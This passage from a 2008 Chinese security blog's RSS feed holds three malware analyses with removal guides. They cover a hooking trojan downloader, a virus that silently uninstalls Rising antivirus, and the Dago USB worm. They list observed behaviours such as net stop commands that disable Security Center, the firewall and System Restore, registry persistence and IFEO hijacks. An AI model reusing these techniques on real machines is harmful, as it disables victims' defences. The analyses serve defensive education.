SYSTEM\CurrentControlSet\Control\SafeBoot\Network\</p>
<p>6.关闭带有指定字样的窗口，诸如：<br>
江民<br>
金山毒霸<br>
诺顿<br>
卡巴<br>
瑞星<br>
木马<br>
病毒<br>
杀毒<br>
杀软<br>
专杀<br>
组策略<br>
防火墙<br>
360安全卫士<br>
...</p>
<p>7.修改注册表禁用任务管理器，破坏显示隐藏文件</p>
<p>8.启动IE下载木马和病毒文件<br>
下载地址：http://*****.cn/dir/index_pic/mm/microsoft.exe<br>
http://*****.cn/dir/index_pic/mm/cq.exe<br>
http://*****.cn/dir/index_pic/mm/wow.exe<br>
到%temp%文件夹下面</p>
<p>9.释放批处理删除自身</p>
<p><strong>解决方法：<br>
</strong>由于此病毒在资源管理器和注册表编辑器（包括常用工具sreng中均不可见）所以我们可以先借助Icesword恢复病毒挂的钩子再进行其他操作</p>
<p>需要下载的工具 Icesword1.22版本和processexplorer</p>
<p>1.打开processexplorer<br>
查找两个互相守护的svchost.exe进程，记住他们的PID</p>
<div forimg="1">
<p><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/newcenturysun/pic/item/1519bbc3d0586e44b319a8cf.jpg"></p>
<p>2.打开Icesword.exe<br>
功能选项卡－高级扫描<br>
此时会弹出一个扫描模块hooks的窗口，单击一般性扫描<br>
扫描完以后选中所有和%systemroot%\system32\Hook_nwizs.dll有关的项目 单击恢复</p>
<div forimg="1">
<p><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/newcenturysun/pic/item/ccf2b7cc55b3e90101e928cf.jpg"></p>
<p>还是Icesword里面 功能选项卡－进程<br>
文件 菜单 设置，勾选禁止进线程创建<br>
然后分别结束刚才那两个svchost.exe进程（根据刚才记住的那两个PID寻找）</p>
<div forimg="1">
<p><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/newcenturysun/pic/item/e1606cf0505ccbd27931aac8.jpg"></p>
<p>3.此时就可以看到病毒文件和注册表项目了<br>
打开sreng<br>
启动项目 － 注册表<br>
删除如下项目<br>
&lt;nwizs&gt;&lt;%systemroot%\system32\nwizs.exe&gt; []</p>
<p>并删除所有红色的IFEO项目<br>
系统修复-Windows Shell/IE 全选 点击修复</p>
<p>系统修复 高级修复 修复安全模式</p>
<p>4.重启计算机<br>
双击我的电脑，工具，文件夹选项，查看，单击选取&quot;显示隐藏文件或文件夹&quot; 并清除&quot;隐藏受保护的操作系统文件（推荐）&quot;前面的钩。在提示确定更改时，单击&ldquo;是&rdquo; 然后确定<br>
点击 菜单栏下方的 文件夹按钮（搜索右边的按钮）<br>
在左边的资源管理器中单击打开系统所在盘<br>
删除如下文件<br>
%systemroot%\system32\Hook_nwizs.dll<br>
%systemroot%\system32\nwizs.exe<br>
以及各个分区下的nwizs.exe 和autorun.inf文件</p>
</div>
</div>
</div> <a href="http://hi.baidu.com/newcenturysun/blog/item/2f3e668bbc765916c8fc7aff.html">阅读全文</a>
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/newcenturysun/blog/category/%B2%A1%B6%BE%B7%C0%B7%B6%D3%EB%C9%B1%B3%FD">病毒防范与杀除</a>&nbsp;<a href="http://hi.baidu.com/newcenturysun/blog/item/2f3e668bbc765916c8fc7aff.html#comment">查看评论</a>]]></description>
        <pubDate>2008-03-25  23:47</pubDate>
        <category><![CDATA[病毒防范与杀除]]></category>
        <author><![CDATA[newcenturysun]]></author>
		<guid>http://hi.baidu.com/newcenturysun/blog/item/2f3e668bbc765916c8fc7aff.html</guid>
</item>

<item>
        <title><![CDATA[警惕自动卸载杀毒软件的恶性病毒]]></title>
        <link><![CDATA[http://hi.baidu.com/newcenturysun/blog/item/63e42ddb8fc5e462d0164e08.html]]></link>
        <description><![CDATA[
		
		<p><font color="#ff0000" size="2">作者：清新阳光&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  ( </font><a href="http://hi.baidu.com/newcenturysun"><font color="#ff0000" size="2">http://hi.baidu.com/newcenturysun</font></a><font size="2"><font color="#ff0000">)<br>
日期：2008/03/07&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  (转载请保留此声明)</font> </font></p>
<p>最近出现了一些通过调用杀毒软件的卸载程序后台自动卸载杀毒软件的病毒，希望大家注意，下面是某个类似病毒的简单分析何针对此类病毒的防范。</p>
<p>File: NTDUBECT.EXE<br>
Size: 117760 bytes<br>
Modified: 2008年3月1日, 9:11:10<br>
MD5: 1AB6A852EF767FDBB43A4624DA973691<br>
SHA1: 8B5D305B6E50E884B57F9FB72BDF329717ACB904<br>
CRC32: 1A37BB79</p>
<p>1.病毒启动后，调用RegOpenKeyEx函数打开HKEY_LOCAL_MACHINE\SOFTWARE\rising\Rav键，之后利用RegQueryValueEx函数获得该键下面的installpath信息，即瑞星的安装路径。之后会在后台启动瑞星安装目录下Update\Setup.exe的卸载程序，成功启动后，会查找类名为Button，窗口为卸载(&amp;U)的窗口，然后PostMessage发送消息，接着查找名为&ldquo;下一步(&amp;N)&rdquo;的窗口，再PostMessage模拟用户按键发送消息，这样就完成了模拟卸载的过程。</p>
<p>2.其他行为<br>
调用cmd.exe执行net stop &quot;Security Center&quot;<br>
net stop &quot;Windows Firewall/Internet Connection Sharing (ICS)&quot;<br>
和net stop System Restore Service的命令</p>
<p>关闭安全中心，Windows个人防火墙和系统还原</p>
<p>3.在HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run下面添加<br>
&quot;Wingin&quot; = %SYSTEM%\WINGIN.EXE的项目达到开机启动自身的目的</p>
<p>4.另外该病毒会生成如下文件<br>
%systemroot%\system32\knlExt.dll<br>
%systemroot%\system32\Drivers\usbKeyInit.sys<br>
%systemroot%\system32\Wingin.exe</p>
<p>可能由于病毒本身的bug问题,病毒没有运行成功</p>
<p>随着杀毒软件进入了主动防御时代,传统的在ring3级别结束杀毒软件的技术已经逐渐失效，而病毒作者又想出了利用杀毒软件的卸载功能自动卸载杀毒软件这一狠招！因此我们应该严密防范病毒利用此种办法破坏杀毒软件，具体到瑞星杀毒软件，可以利用瑞星主动防御里面的程序启动控制来防范，如图：<br>
打开瑞星杀毒软件主动防御设置界面－程序启动控制 并按照图示设置即可</p>
<div forimg="1">
<p><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/newcenturysun/pic/item/77e5c5c8b57875077e3e6f5a.jpg"></p>
<p><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/newcenturysun/pic/item/9adfe336ff3cc5210b55a924.jpg"></p>
<div forimg="1">
<p><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/newcenturysun/pic/item/5c267f6369f4d7700d33fa75.jpg"></p>
</div>
</div> <a href="http://hi.baidu.com/newcenturysun/blog/item/63e42ddb8fc5e462d0164e08.html">阅读全文</a>
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/newcenturysun/blog/category/%B2%A1%B6%BE%B7%C0%B7%B6%D3%EB%C9%B1%B3%FD">病毒防范与杀除</a>&nbsp;<a href="http://hi.baidu.com/newcenturysun/blog/item/63e42ddb8fc5e462d0164e08.html#comment">查看评论</a>]]></description>
        <pubDate>2008-03-07  16:33</pubDate>
        <category><![CDATA[病毒防范与杀除]]></category>
        <author><![CDATA[newcenturysun]]></author>
		<guid>http://hi.baidu.com/newcenturysun/blog/item/63e42ddb8fc5e462d0164e08.html</guid>
</item>

<item>
        <title><![CDATA[行为恶劣的U盘病毒Dago的分析]]></title>
        <link><![CDATA[http://hi.baidu.com/newcenturysun/blog/item/a8bfe20304770a733812bb4b.html]]></link>
        <description><![CDATA[
		
		<p><font color="#ff0000" size="2">作者：清新阳光&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  ( </font><a href="http://hi.baidu.com/newcenturysun"><font color="#ff0000" size="2">http://hi.baidu.com/newcenturysun</font></a><font size="2"><font color="#ff0000">)<br>
日期：2008/02/28&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  (转载请保留此声明)</font> </font></p>
<p>这是一个用VB编写的病毒，行为有点类似落雪，处理起来比较麻烦，没有下载行为，作者的目的似乎只是为了炫耀自己的技术</p>
<p>具体分析：<br>
File: Nitip.exe<br>
Size: 47616 bytes<br>
File Version: 1.00<br>
Modified: 2008年2月28日, 12:04:14<br>
MD5: A1E036A64AFDD8F89B434CC03F418867<br>
SHA1: 553DDACA9B5CEEF95EA4D265D35069C3459BA4EC<br>
CRC32: 386A5FAD</p>
<p>1.病毒伪装成文件夹图案诱使用户点击<br>
运行后，衍生如下文件或者副本：<br>
C:\Documents and Settings\用户名\Local Settings\Application Data\WINDOWS\CSRSS.EXE<br>
C:\Documents and Settings\用户名\Local Settings\Application Data\WINDOWS\LSASS.EXE<br>
C:\Documents and Settings\用户名\Local Settings\Application Data\WINDOWS\SERVICES.EXE<br>
C:\Documents and Settings\用户名\Local Settings\Application Data\WINDOWS\SMSS.EXE<br>
C:\Documents and Settings\用户名\Local Settings\Application Data\WINDOWS\WINLOGON.EXE<br>
C:\Documents and Settings\用户名*****.exe（*****代表随机字符）<br>
C:\dago\****.exe（****代表随机字符）<br>
C:\***** 用户名.exe（*****代表随机字符）<br>
C:\WINDOWS.exe<br>
C:\WINDOWS\system32\\Media\Windows.cmd<br>
C:\WINDOWS\User\.exe<br>
C:\WINDOWS\system\server.exe<br>
C:\WINDOWS\Dago\Dago.exe</p>
<p>各个分区下面生成一个Dago的文件夹和一个***** 用户名.exe（*****代表随机字符）生成的病毒体</p>
<p>2.试图删除下面目录中的文件<br>
C:\Progra~1\AntiViralToolkitPro\*.*<br>
C:\Norman\*.*<br>
C:\Progra~1\Norman\*.*<br>
C:\Progra~1\Mcafee\McafeeVirusScan\*.*<br>
C:\Progra~1\NortonAntiVirus\*.*<br>
C:\Progra~1\NetworkAssociates\Virusscan\*.*<br>
C:\Progra~1\NetworkAssociates\Virusscan\*.*<br>
C:\windows\system32\gpedit.msc<br>
C:\Program Files\Kaspersky Lab\KasperskyAnti-VirusPersonal Pro\*.*<br>
C:\Program Files\Kaspersky Lab\KasperskyAnti-VirusPersonal\*.*</p>
<p>3.添加映像劫持项目<br>
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe<br>
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe<br>
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe<br>
劫持到</p>
<p>4.操作注册表，禁用注册表编辑器，任务管理器，cmd等常用工具，并隐藏&ldquo;文件夹选项&rdquo;，隐藏文件扩展名<br>
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\DisableTaskMgr: 0x00000001<br>
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\DisableRegistryTools: 0x00000001<br>
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoFolderOptions: 0x00000001<br>
HKU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableCMD: 0x00000001<br>
HKU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt: 0x00000001</p>
<p>之前释放了C:\WINDOWS.exe，而且把真正的C:\WINDOWS目录隐藏了，用户则很容易会点击伪装的Windows文件夹（病毒文件）</p>
<div forimg="1">
<p><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/newcenturysun/pic/item/e3c62d013655c21e7bec2cce.jpg"></p>
<p>5.修改C:\windows\system32\Oeminfo.ini修改电脑的OEM信息<br>
并写入如下字样：<br>
Your computer has been infected with Dago<br>
www.geocities.com/evanta44/<br>
buat ta tau!!!</p>
<p><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/newcenturysun/pic/item/ccf2b7cc6fb2f70001e928cf.jpg"></p>
<p><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/newcenturysun/pic/item/b50305df6a87f003632798c8.jpg"></p>
<p>6.修改IE主页为www.geocities.com/evanta44/，以及IE浏览器的标题为Dago Dago Dago<br>
HKU\Software\Microsoft\Internet Explorer\Main\Start Page: &quot;www.geocities.com/evanta44/&quot;<br>
HKU\Software\Microsoft\Internet Explorer\Main\Window Title: &quot;Dago Dago Dago Dago&quot;</p>
<p>7.更改C:\WINDOWS的目录属性为隐藏</p>
<p>8.查找类名为#32770的窗口并通过查找窗口名称关闭某些软件，例如<br>
HijackThis-v1.99.1<br>
Windows Task Manager（任务管理器）</p>
<p>9.利用多种方式实现开机启动<br>
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]<br>
&nbsp;&nbsp;&nbsp;  &lt;SQL&gt;&lt;C:\WINDOWS\system\server.exe&gt; []<br>
&nbsp;&nbsp;&nbsp;  &lt;User&gt;&lt;C:\WINDOWS\User\.exe&gt; []<br>
&nbsp;&nbsp;&nbsp;  &lt;Winlogon&gt;&lt;C:\Documents and Settings\用户名\Local Settings\Application Data\WINDOWS\WINLOGON.EXE&gt; []<br>
&nbsp;&nbsp;&nbsp;  &lt;Services用户名&gt;&lt;C:\Documents and Settings\用户名\Local Settings\Application Data\WINDOWS\SERVICES.EXE&gt; []<br>
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]<br>
&nbsp;&nbsp;&nbsp;  &lt;用户名 di Dago&gt;&lt;C:\WINDOWS\Dago\Dago.exe&gt; []<br>
&nbsp;&nbsp;&nbsp;  &lt;CueX44&gt;&lt;C:\WINDOWS\Dago\Dago.exe&gt; []<br>
&nbsp;&nbsp;&nbsp;  &lt;Csrss&gt;&lt;C:\Documents and Settings\用户名\Local Settings\Application Data\WINDOWS\CSRSS.EXE&gt; []<br>
&nbsp;&nbsp;&nbsp;  &lt;Lsass&gt;&lt;C:\Documents and Settings\用户名\Local Settings\Application Data\WINDOWS\LSASS.EXE&gt; []<br>
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]<br>
&nbsp;&nbsp;&nbsp;  &lt;shell&gt;&lt;Explorer.exe &quot;C:\WINDOWS\system32\\config\systemprofile\Local Settings\Application Data\tic.exe&quot;&gt; [N/A]<br>
&nbsp;&nbsp;&nbsp;  &lt;Userinit&gt;&lt;C:\WINDOWS\system32\userinit.exe,C:\WINDOWS\system32\\Media\Windows.cmd&gt; [N/A]</p>
<p>10.修改默认的屏幕保护程序为C:\WINDOWS\system32\evanta44.SCR（病毒文件）<br>
[HKEY_CURRENT_USER\Control Panel\Desktop]<br>
&lt;SCRNSAVE.EXE&gt;&lt;C:\WINDOWS\system32\evanta44.SCR&gt; [N/A]（随机文件名）</p>
<p>解决方法：<br>
下载sreng:http://www.skycn.com/soft/23312.html#download<br>
Icesword：<a href="http://mail.ustc.edu.cn/~jfpan/download/IceSword122cn.zip">http://mail.ustc.edu.cn/~jfpan/download/IceSword122cn.zip</a></p>
<p>1.在桌面上单击鼠标右键－属性－屏幕保护程序，记住默认的屏幕保护程序的名字，本例中为evanta44</p>
<p><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/newcenturysun/pic/item/9adfe3363d5d03210a55a9bb.jpg"></p>
<p><br>
解压Icesword到一个文件夹，运行Icesword.exe<br>
结束如下进程<br>
C:\WINDOWS\system32\evanta44.SCR（由刚才记住的屏保程序名称为准）<br>
C:\WINDOWS\system\server.exe<br>
C:\WINDOWS\User\.exe<br>
C:\Documents and Settings\用户名\Local Settings\Application Data\WINDOWS\WINLOGON.EXE<br>
C:\Documents and Settings\用户名\Local Settings\Application Data\WINDOWS\SERVICES.EXE<br>
C:\WINDOWS\Dago\Dago.exe<br>
C:\Documents and Settings\用户名\Local Settings\Application Data\WINDOWS\CSRSS.EXE<br>
C:\Documents and Settings\用户名\Local Settings\Application Data\WINDOWS\LSASS.EXE<br>
C:\WINDOWS\system32\\config\systemprofile\Local Settings\Application Data\tic.exe<br>
C:\WINDOWS\system32\\Media\Windows.cmd</p>
<p>或者查找所有图标为文件夹样子的进程，依次结束即可<br>
<img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/newcenturysun/pic/item/5e11a5357a8bf89ba61e12d5.jpg"></p>
<p><br>
打开我的电脑，点击菜单栏下方的&ldquo;搜索&rdquo;按钮<br>
并设定如下限制条件：<br>
1.指定大小 至多48KB<br>
2.文件类型 应用程序<br>
3.勾选 搜索隐藏的文件和文件夹</p>
<p><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/newcenturysun/pic/item/9adfe3363d6303210a55a985.jpg"></p>
<p>把搜索到的文件按照大小排列 找到所有图标为文件夹的文件 依次删除</p>
<p>最后注意删除各个分区下面的Dago文件夹和***** 用户名.exe（*****代表随机字符）<br>
<img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/newcenturysun/pic/item/513393010f2afdc6277fb586.jpg"></p>
<p>2.打开sreng<br>
启动项目 注册表 删除如下项目（假设系统盘在C盘）<br>
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]<br>
&nbsp;&nbsp;&nbsp;  &lt;SQL&gt;&lt;C:\WINDOWS\system\server.exe&gt; []<br>
&nbsp;&nbsp;&nbsp;  &lt;User&gt;&lt;C:\WINDOWS\User\.exe&gt; []<br>
&nbsp;&nbsp;&nbsp;  &lt;Winlogon&gt;&lt;C:\Documents and Settings\用户名\Local Settings\Application Data\WINDOWS\WINLOGON.EXE&gt; []<br>
&nbsp;&nbsp;&nbsp;  &lt;Services用户名&gt;&lt;C:\Documents and Settings\用户名\Local Settings\Application Data\WINDOWS\SERVICES.EXE&gt; []<br>
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]<br>
&nbsp;&nbsp;&nbsp;  &lt;用户名 di Dago&gt;&lt;C:\WINDOWS\Dago\Dago.exe&gt; []<br>
&nbsp;&nbsp;&nbsp;  &lt;CueX44&gt;&lt;C:\WINDOWS\Dago\Dago.exe&gt; []<br>
&nbsp;&nbsp;&nbsp;  &lt;Csrss&gt;&lt;C:\Documents and Settings\用户名\Local Settings\Application Data\WINDOWS\CSRSS.EXE&gt; []<br>
&nbsp;&nbsp;&nbsp;  &lt;Lsass&gt;&lt;C:\Documents and Settings\用户名\Local Settings\Application Data\WINDOWS\LSASS.EXE&gt; []<br>
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon下的<br>
shell值改为Explorer.exe <br>
Userinit值改为C:\WINDOWS\system32\userinit.exe,</p>
<p>删除所有IFEO项目</p>
<p>系统修复－Windows Shell/IE 全选 点击修复按钮</p>
</div> <a href="http://hi.baidu.com/newcenturysun/blog/item/a8bfe20304770a733812bb4b.html">阅读全文</a>
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/newcenturysun/blog/category/%B2%A1%B6%BE%B7%C0%B7%B6%D3%EB%C9%B1%B3%FD">病毒防范与杀除</a>&nbsp;<a href="http://hi.baidu.com/newcenturysun/blog/item/a8bfe20304770a733812bb4b.html#comment">查看评论</a>]]></description>
        <pubDate>2008-02-28  14:01</pubDate>
        <category><![CDATA[病毒防范与杀除]]></category>
        <author><![CDATA[newcenturysun]]></author>
		<guid>http://hi.baidu.com/newcenturysun/blog/item/a8bfe20304770a733812bb4b.html</guid>
</item>


</channel>
</rss>